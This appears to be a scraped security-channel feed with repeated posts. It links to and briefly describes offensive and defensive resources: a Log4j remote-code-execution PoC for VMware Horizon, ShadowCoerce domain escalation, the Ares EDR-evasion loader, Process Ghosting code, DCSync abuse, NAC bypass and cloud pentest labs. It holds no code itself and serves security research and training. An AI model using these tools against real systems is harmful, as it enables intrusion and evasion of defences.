Important Windows processes for Threat Hunting
https://www.socinvestigation.com/important-windows-processes-for-threat-hunting/
#edr #detection #forensic #process
https://www.socinvestigation.com/important-windows-processes-for-threat-hunting/
#edr #detection #forensic #process
Security Investigation - Be the first to investigate
Important Windows processes for Threat Hunting - Security Investigation
Introduction: The various processes that are running in a Windows computer. Some of the processes are parts of the operating system, while others are applications automatically launched at startup or manually by the user or hackers. Knowing What’s normal…
👍2
Log4jHorizon
A proof of concept for VMWare Horizon instances and allows attackers to execute code as an unauthenticated user using a single HTTP request.
Research:
https://www.sprocketsecurity.com/blog/crossing-the-log4j-horizon-a-vulnerability-with-no-return
Exploit:
https://github.com/puzzlepeaches/Log4jHorizon
#log4j #vmware #horizon #rce
A proof of concept for VMWare Horizon instances and allows attackers to execute code as an unauthenticated user using a single HTTP request.
Research:
https://www.sprocketsecurity.com/blog/crossing-the-log4j-horizon-a-vulnerability-with-no-return
Exploit:
https://github.com/puzzlepeaches/Log4jHorizon
#log4j #vmware #horizon #rce
👍3
Domain Escalation — ShadowCoerce (MS-FSRVP)
Coercing the domain controller machine account to authenticate to a host which is under the control of a threat actor could lead to domain compromise. The most notable technique which involves coerced authentication is the PetitPotam attack which uses the Encrypting File System Remote Protocol (MS-EFSR). However, this is not the only protocol which could be utilized for domain escalation.
Research:
https://pentestlaboratories.com/2022/01/11/shadowcoerce/
PoC:
https://github.com/ShutdownRepo/ShadowCoerce
#ad #escalation #relay #redteam
Coercing the domain controller machine account to authenticate to a host which is under the control of a threat actor could lead to domain compromise. The most notable technique which involves coerced authentication is the PetitPotam attack which uses the Encrypting File System Remote Protocol (MS-EFSR). However, this is not the only protocol which could be utilized for domain escalation.
Research:
https://pentestlaboratories.com/2022/01/11/shadowcoerce/
PoC:
https://github.com/ShutdownRepo/ShadowCoerce
#ad #escalation #relay #redteam
Password Hash Cracking in AWS
https://www.sans.org/blog/password-hash-cracking-amazon-web-services/
#aws #cuda #hashcat
https://www.sans.org/blog/password-hash-cracking-amazon-web-services/
#aws #cuda #hashcat
www.sans.org
Password Hash Cracking in Amazon Web Services | SANS Institute
This article will discuss the use of cracking cloud computing resources in Amazon Web Services (AWS) to crack password hashes.
Free Labs to Learn Cloud Penetration Testing
https://flaws.cloud/
https://flaws2.cloud/
https://github.com/OWASP/Serverless-Goat
https://n0j.github.io/2017/10/02/aws-s3-ctf.html
https://github.com/torque59/AWS-Vulnerable-Lambda
https://github.com/wickett/lambhack
https://github.com/BishopFox/iam-vulnerable
https://github.com/RhinoSecurityLabs/cloudgoat
https://github.com/appsecco/attacking-cloudgoat2
https://github.com/m6a-UdS/dvca
https://github.com/OWASP/DVSA
https://github.com/nccgroup/sadcloud
#cloud #aws #pentest
https://flaws.cloud/
https://flaws2.cloud/
https://github.com/OWASP/Serverless-Goat
https://n0j.github.io/2017/10/02/aws-s3-ctf.html
https://github.com/torque59/AWS-Vulnerable-Lambda
https://github.com/wickett/lambhack
https://github.com/BishopFox/iam-vulnerable
https://github.com/RhinoSecurityLabs/cloudgoat
https://github.com/appsecco/attacking-cloudgoat2
https://github.com/m6a-UdS/dvca
https://github.com/OWASP/DVSA
https://github.com/nccgroup/sadcloud
#cloud #aws #pentest
GitHub
GitHub - OWASP/Serverless-Goat: OWASP ServerlessGoat: a serverless application demonstrating common serverless security flaws
OWASP ServerlessGoat: a serverless application demonstrating common serverless security flaws - OWASP/Serverless-Goat
👍1
AWS IAM explained for RedTeam & BlueTeam
https://infosecwriteups.com/aws-iam-explained-for-red-and-blue-teams-2dda8b20fbf7
#aws #iam #redteam #blueteam
https://infosecwriteups.com/aws-iam-explained-for-red-and-blue-teams-2dda8b20fbf7
#aws #iam #redteam #blueteam
Medium
AWS IAM explained for Red and Blue teams
Introduction
Suspicious Named Pipe Events
https://medium.com/falconforce/falconfriday-suspicious-named-pipe-events-0xff1b-fe475d7ebd8
#windows #pipe #events #blueteam #redteam
https://medium.com/falconforce/falconfriday-suspicious-named-pipe-events-0xff1b-fe475d7ebd8
#windows #pipe #events #blueteam #redteam
Medium
FalconFriday — Suspicious named pipe events — 0xFF1B
TL;DR for blue teams: Attackers use named pipes to conveniently move laterally and mostly bypass detection. This blog post shows a method…
Active Directory ACL Visualizer and Explorer
adalanche tool gives instant results, showing you what permissions users and groups have in an Active Directory. It is useful for visualizing and exploring who can take over accounts, machines or the entire domain, and can be used to find and show misconfigurations.
https://github.com/lkarlslund/adalanche
#ad #acl #visualizer #blueteam #redteam
adalanche tool gives instant results, showing you what permissions users and groups have in an Active Directory. It is useful for visualizing and exploring who can take over accounts, machines or the entire domain, and can be used to find and show misconfigurations.
https://github.com/lkarlslund/adalanche
#ad #acl #visualizer #blueteam #redteam
Network Access Control (NAC) Bypass
This post will be all about Network Access Control (NAC) solutions and how they might lull you into a sense of security.
https://luemmelsec.github.io/I-got-99-problems-but-my-NAC-aint-one/
#nac #bypass #pentest
This post will be all about Network Access Control (NAC) solutions and how they might lull you into a sense of security.
https://luemmelsec.github.io/I-got-99-problems-but-my-NAC-aint-one/
#nac #bypass #pentest
luemmelsec.github.io
I got 99 problems but my NAC ain´t one
This post will be all about Network Access Control (NAC) solutions and how they might lull you into a sense of security.
Designed to keep rouge devices out of your network, I´ll show you ways around it, as well as ways to protect yourself.
From a pentester´s…
Designed to keep rouge devices out of your network, I´ll show you ways around it, as well as ways to protect yourself.
From a pentester´s…
Ares
This project is a PoC loader written in C/C++ based on the Transacted Hollowing technique. It features:
— PPID spoofing
— Dynamic function resolution with API hashing
— NTDLL unhooking
— AES256 CBC Encryption
— CIG to block non-Microsoft-signed binaries
https://github.com/Cerbersec/Ares
#edr #evasion #cpp
This project is a PoC loader written in C/C++ based on the Transacted Hollowing technique. It features:
— PPID spoofing
— Dynamic function resolution with API hashing
— NTDLL unhooking
— AES256 CBC Encryption
— CIG to block non-Microsoft-signed binaries
https://github.com/Cerbersec/Ares
#edr #evasion #cpp
GitHub
GitHub - Cerbersec/Ares: Project Ares is a Proof of Concept (PoC) loader written in C/C++ based on the Transacted Hollowing technique
Project Ares is a Proof of Concept (PoC) loader written in C/C++ based on the Transacted Hollowing technique - Cerbersec/Ares
👍1
Vergilius
A collection of Microsoft Windows kernel structures, unions and enumerations. Most of them are not officially documented and cannot be found in Windows Driver Kit (WDK) headers. The target audience of this site is driver developers and kernel researches
https://www.vergiliusproject.com/
#windows #driver #kernel
A collection of Microsoft Windows kernel structures, unions and enumerations. Most of them are not officially documented and cannot be found in Windows Driver Kit (WDK) headers. The target audience of this site is driver developers and kernel researches
https://www.vergiliusproject.com/
#windows #driver #kernel
Malware Analysis: Syscalls
Great guide and overview about Syscalls and how to start diagnosing them.
https://jmpesp.me/malware-analysis-syscalls-example/
#maldev #cpp #syscall
Great guide and overview about Syscalls and how to start diagnosing them.
https://jmpesp.me/malware-analysis-syscalls-example/
#maldev #cpp #syscall
Active Directory Checklist — Attack & Defense Cheatsheet
https://cybersecuritynews.com/active-directory-checklist/
#ad #cheatsheet #redteam #blueteam
https://cybersecuritynews.com/active-directory-checklist/
#ad #cheatsheet #redteam #blueteam
Cyber Security News
Active Directory Attack Kill Chain Checklist & Tools List- 2025
Here we are elaborating the tactics, techniques, and procedures (TTPs) attackers are leveraging to compromise active directory and guidance
DevSecOps pipelines
— Secrets scan
— Code scan
— Dependency check (code libraries + image packages)
— DAST
— Exposures check
Pipelines:
https://gitlab.com/whitespots-public/pipelines
Security scanners:
https://gitlab.com/whitespots-public/security-images
Example project integration:
https://gitlab.com/whitespots-public/vulnerable-python-app
#appsec #devsecops #pipelines
— Secrets scan
— Code scan
— Dependency check (code libraries + image packages)
— DAST
— Exposures check
Pipelines:
https://gitlab.com/whitespots-public/pipelines
Security scanners:
https://gitlab.com/whitespots-public/security-images
Example project integration:
https://gitlab.com/whitespots-public/vulnerable-python-app
#appsec #devsecops #pipelines
🔥3👍2
LDAP Relay Scan
A tool to check Domain Controllers for LDAP server protections regarding the relay of NTLM authentication.
https://github.com/zyn3rgy/LdapRelayScan
#ad #ldap #scan #tools
A tool to check Domain Controllers for LDAP server protections regarding the relay of NTLM authentication.
https://github.com/zyn3rgy/LdapRelayScan
#ad #ldap #scan #tools
GitHub
GitHub - zyn3rgy/LdapRelayScan: Check for LDAP protections regarding the relay of NTLM authentication
Check for LDAP protections regarding the relay of NTLM authentication - zyn3rgy/LdapRelayScan
Adding DCSync Permissions from Linux
https://www.n00py.io/2022/01/adding-dcsync-permissions-from-linux/
#ad #dcsync #linux
https://www.n00py.io/2022/01/adding-dcsync-permissions-from-linux/
#ad #dcsync #linux
www.n00py.io
Adding DCSync Permissions from Linux
Recently I came upon an attack path in BloodHound that looked like this: I had control of a computer object (an Exchange server) that effectively had WriteDacl over the domain. I had a few constraints as well: All systems were configured with EDR I only had…
Process Ghosting
This article describes a new executable image tampering attack similar to, but distinct from, Doppelgänging and Herpaderping. With this technique, an attacker can write a piece of malware to disk in such a way that it’s difficult to scan or delete it — and where it then executes the deleted malware as though it were a regular file on disk. This technique does not involve code injection, process hollowing, or Transactional NTFS (TxF).
Research:
https://www.elastic.co/blog/process-ghosting-a-new-executable-image-tampering-attack
C# Code Snippet:
https://github.com/Wra7h/SharpGhosting
#edr #evasion #process #ghosting #csharp
This article describes a new executable image tampering attack similar to, but distinct from, Doppelgänging and Herpaderping. With this technique, an attacker can write a piece of malware to disk in such a way that it’s difficult to scan or delete it — and where it then executes the deleted malware as though it were a regular file on disk. This technique does not involve code injection, process hollowing, or Transactional NTFS (TxF).
Research:
https://www.elastic.co/blog/process-ghosting-a-new-executable-image-tampering-attack
C# Code Snippet:
https://github.com/Wra7h/SharpGhosting
#edr #evasion #process #ghosting #csharp
🔥3